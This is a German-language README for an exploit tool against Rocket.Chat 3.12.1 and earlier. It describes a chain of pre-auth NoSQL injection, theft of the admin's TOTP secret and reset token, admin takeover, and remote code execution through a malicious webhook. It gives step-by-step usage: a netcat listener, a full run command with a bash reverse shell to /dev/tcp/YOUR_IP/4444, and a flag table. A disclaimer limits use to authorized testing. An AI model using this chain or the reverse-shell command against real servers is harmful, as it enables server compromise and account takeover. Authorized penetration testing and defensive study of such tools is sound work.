
Exploit für Rocket.Chat 3.12.1 RCE über Pre-Auth-NoSQL-Injection, der das TOTP-Geheimnis des Administrators und das Passwort-Reset-Token leakt, um Remote-Codeausführung durch bösartige Webhook-Integration zu erreichen.
Nutzt eine Pre-Auth-NoSQL-Injection-Schwachstelle in Rocket.Chat 3.12.1 aus, um das TOTP-Geheimnis des Administrators und das Passwort-Reset-Token zu erlangen, das Admin-Konto zu übernehmen und über eine bösartige Webhook-Integration eine RCE zu erreichen.
Rocket.Chat <= 3.12.1
pip install -r requirements.txt
Bevor du den Exploit ausführst, starte in einem separaten Terminal einen Netcat-Listener, um die eingehende Reverse-Shell zu empfangen:
nc -lvnp 4444
Lass dieses Terminal geöffnet. Sobald der Exploit erfolgreich läuft, erscheint deine Shell hier.
python3 pwn_rocketchat.py \
-t 'http://TARGET:3000' \
-u 'USERNAME' \
-p 'PASSWORD' \
-e '[email protected]' \
-a 'adminusername' \
-c '/bin/bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'
| Flag | Beschreibung |
|---|---|
-t | Ziel-Rocket.Chat-URL |
-u | Dein registrierter Benutzername mit niedrigen Rechten |
-p | Dein registriertes Passwort mit niedrigen Rechten |
-e | E-Mail-Adresse des Administrators |
-a | Benutzername des Administrators |
-c | Reverse-Shell-Befehl |
-v | Ausführlicher Modus (zeigt rohe Antworten) |
Dieses Tool dient nur zu Bildungszwecken und für autorisierte Penetrationstests. Der Autor ist nicht verantwortlich für Missbrauch oder Schäden, die durch dieses Tool verursacht werden. Hol vor dem Testen immer eine ordnungsgemäße schriftliche Genehmigung ein.